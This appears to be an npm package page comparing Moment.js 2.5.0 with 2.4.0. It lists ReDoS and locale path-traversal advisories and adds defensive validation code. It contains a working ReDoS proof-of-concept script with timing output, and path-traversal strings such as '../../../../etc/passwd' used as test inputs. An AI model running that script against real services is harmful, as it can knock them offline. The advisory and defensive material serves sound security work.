Moment.js version 2.5.0 is a refinement of the popular JavaScript date manipulation library, building on version 2.4.0. Both versions parse, validate, manipulate and format dates and times in web browsers and Node.js, which makes them a common dependency wherever date logic is handled. The author remains the same, Iskren Ivov Chernev.
The core functionality is consistent between the two; moving from 2.4.0 to 2.5.0 brings internal improvements and bug fixes rather than new features, so developers who have used 2.4.0 extensively will find a familiar API and little to relearn when upgrading. Both declare the same development dependencies, Grunt, Nodeunit and uglify-js, which are used for testing, concatenating and minifying the JavaScript files.
The notable difference is the release date: version 2.5.0 was released on December 23, 2013, version 2.4.0 on October 27, 2013. The two months between them cover bug fixes, performance work and minor additions made in response to community feedback and reported issues. Between the two, 2.5.0 is the one to pick. Neither, however, is acceptable where untrusted input reaches the library: 2.5.0 falls inside the affected range of every advisory listed below, so the practical recommendation is to upgrade to at least 2.29.2, the highest fixed version named on this page. Both distributions are accessible through npm, in this case via the tarball URLs provided.
All known vulnerabilities affecting version 2.5.0 of the package
Regular Expression Denial of Service in moment
Versions of moment prior to 2.11.2 are affected by a regular expression denial of service vulnerability. The vulnerability is triggered when arbitrary user input is passed into moment.duration(). The script below feeds moment.duration() progressively longer strings of the form '-111...1' and prints how long each call takes:
var moment = require('moment');

// Build a string of len + 1 copies of chr (the loop runs to <= len, so the
// result is one character longer than len).
var genstr = function (len, chr) {
    var result = "";
    for (var i = 0; i <= len; i++) {
        result = result + chr;
    }
    return result;
};

// Hand moment.duration() ever longer inputs and time each call with process.hrtime().
for (var i = 20000; i <= 10000000; i = i + 10000) {
    console.log("COUNT: " + i);
    var str = '-' + genstr(i, '1');
    console.log("LENGTH: " + str.length);
    var start = process.hrtime();
    moment.duration(str);
    var end = process.hrtime(start); // [seconds, nanoseconds] spent inside moment.duration()
    console.log(end);
}
Run against a vulnerable release, the timings grow roughly quadratically with the length of the input: doubling the length from 20002 to 40004 characters takes the call from about 0.62 s to about 2.44 s, and 60006 characters already cost 5.65 s. In the recorded run the loop counter was shared between genstr and the outer loop, which is why COUNT advances by 10001 rather than 10000; the timings are unaffected.
$ node moment.js
COUNT: 20000
LENGTH: 20002
[ 0, 618931029 ]
COUNT: 30001
LENGTH: 30003
[ 1, 401413894 ]
COUNT: 40002
LENGTH: 40004
[ 2, 437075303 ]
COUNT: 50003
LENGTH: 50005
[ 3, 824664804 ]
COUNT: 60004
LENGTH: 60006
[ 5, 651335262 ]
Please update to version 2.11.2 or later.
Regular Expression Denial of Service in moment
Affected versions of moment are vulnerable to a low severity regular expression denial of service when parsing dates as strings.
Update to version 2.19.3 or later.
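Both ReDoS advisories above have the same shape, unbounded untrusted input reaching a backtracking regular expression, and the same caller-side defence: bound and check the input before the parser sees it. The following is an added example, not code from moment.js or from the advisories. The length limits and the duration grammar are our own choices (the grammar is deliberately narrower than what moment.duration() accepts), and the parser is passed in as a parameter so the file runs without moment installed.

```javascript
// Added example (not moment.js code): keep untrusted strings away from
// moment.duration() and moment() until they have been bounded and checked.
// MAX_DURATION_LEN and MAX_DATE_LEN are assumed limits chosen for this example.
const MAX_DURATION_LEN = 64;
const MAX_DATE_LEN = 64;

// Strict ISO 8601 duration grammar, anchored at both ends. Every digit run is
// terminated by a distinct designator letter and the groups cannot overlap, so
// a failing match backtracks each group at most once: cost is linear in the
// input length. It is narrower than what moment.duration() accepts by design.
const ISO_DURATION =
  /^[-+]?P(?:\d+Y)?(?:\d+M)?(?:\d+W)?(?:\d+D)?(?:T(?=\d)(?:\d+H)?(?:\d+M)?(?:\d+(?:[.,]\d+)?S)?)?$/;

// Returns { ok: true, value } or { ok: false, reason }. The length check runs
// first, so the regular expression never sees more than MAX_DURATION_LEN chars.
function checkDurationInput(input) {
  if (typeof input !== 'string') return { ok: false, reason: 'not a string' };
  if (input.length > MAX_DURATION_LEN) return { ok: false, reason: 'too long' };
  // A bare 'P' or 'PT' satisfies the grammar, so also demand at least one digit.
  if (!ISO_DURATION.test(input) || !/\d/.test(input)) {
    return { ok: false, reason: 'not an ISO 8601 duration' };
  }
  return { ok: true, value: input };
}

// For date strings the accepted grammar is too wide to pin down here, so the
// generic defence is a length cap plus a printable-ASCII restriction; the
// caller should then parse with one explicit format in strict mode.
function checkDateInput(input) {
  if (typeof input !== 'string') return { ok: false, reason: 'not a string' };
  if (input.length === 0) return { ok: false, reason: 'empty' };
  if (input.length > MAX_DATE_LEN) return { ok: false, reason: 'too long' };
  if (!/^[\x20-\x7e]*$/.test(input)) return { ok: false, reason: 'non-printable characters' };
  return { ok: true, value: input };
}

// Wrap a parser so that only validated input reaches it. `parse` is injected
// (e.g. require('moment').duration) so this file runs without moment installed.
function safeDuration(input, parse) {
  const check = checkDurationInput(input);
  return check.ok ? parse(check.value) : null;
}

// The payload shape from the proof of concept above: '-' followed by 20001 '1's.
// It is rejected on length alone, before any regular expression runs.
const poc = '-' + '1'.repeat(20001);
console.log(poc.length, checkDurationInput(poc));           // 20002 { ok: false, reason: 'too long' }
console.log(checkDurationInput('P1Y2M3DT4H5M6.5S'));        // { ok: true, value: 'P1Y2M3DT4H5M6.5S' }
console.log(safeDuration('-PT30M', (s) => `parsed(${s})`)); // parsed(-PT30M)
```

For dates, pair the length cap with moment's strict parsing mode, moment(input, format, true), so that the string is matched against one explicit format instead of every format the parser knows; that removes most of the regular expression work from the path an attacker controls.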
Path Traversal: 'dir/../../filename' in moment.locale
This vulnerability impacts npm (server) users of moment.js, especially if a user-provided locale string, e.g. fr, is directly used to switch the moment locale. On Node, a locale that has not been loaded yet is resolved by requiring a file named after it from the library's locale directory, so a name containing '../' segments turns that require() into a load of an arbitrary module path on the server.
This problem is patched in 2.29.2, and the patch can be applied to all affected versions (from 1.0.1 up until 2.29.1, inclusive).
Where upgrading is not immediately possible, sanitize the user-provided locale name before passing it to moment.js.
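Sanitising the locale name means treating it as an identifier to look up in an allowlist, never as something passed through to the library's file lookup. The following is an added example, not code from moment.js: the set of supported locales is a constructed sample (a deployment would list the locales it actually ships), and the name grammar is our own choice. Allowlisting is stricter than merely rejecting path separators, which is fine, since locale names have no legitimate need for dots or slashes.

```javascript
// Added example (not moment.js code): resolve a user-supplied locale name to a
// known-good identifier before it reaches moment. SUPPORTED_LOCALES is a
// constructed sample; a deployment lists the locales it actually ships.
const SUPPORTED_LOCALES = new Set(['en', 'en-gb', 'fr', 'fr-ca', 'de', 'es', 'ja', 'zh-cn']);
const DEFAULT_LOCALE = 'en';

// Shape of a locale name: a 2-3 letter language code, then optional
// dash-separated alphanumeric subtags. Dots, slashes and backslashes cannot
// pass this, so '../' style names never get near a require() path.
const LOCALE_SHAPE = /^[a-z]{2,3}(?:-[a-z0-9]{2,8})*$/;

// Returns a name from SUPPORTED_LOCALES, falling back to DEFAULT_LOCALE for
// anything missing, malformed or unknown. Input is lower-cased because moment
// treats locale names case-insensitively ('en-GB' and 'en-gb' are the same).
function resolveLocale(candidate) {
  if (typeof candidate !== 'string') return DEFAULT_LOCALE;
  const name = candidate.trim().toLowerCase();
  if (!LOCALE_SHAPE.test(name)) return DEFAULT_LOCALE;
  if (!SUPPORTED_LOCALES.has(name)) return DEFAULT_LOCALE;
  return name;
}

// Request-handler style usage. The moment function is injected so this file
// runs without moment installed. Setting the locale on the instance rather
// than with the global moment.locale(name) also keeps one request's choice
// from leaking into the next on a server.
function formatForUser(momentLib, isoDate, requestedLocale) {
  const locale = resolveLocale(requestedLocale);
  return momentLib(isoDate).locale(locale).format('LL');
}

// Traversal attempts and unknown names all collapse to the default.
console.log(resolveLocale('fr'));                       // fr
console.log(resolveLocale('en-GB'));                    // en-gb
console.log(resolveLocale('../../../../etc/passwd'));   // en
console.log(resolveLocale('fr/../../../some-module'));  // en
console.log(resolveLocale('xx'));                       // en (well-formed but not shipped)
```

The fallback to a default locale, rather than an error, is a deliberate choice for a formatting path: a bad Accept-Language header or query parameter should degrade the display, not fail the request. Log the rejected value if you want to spot probing.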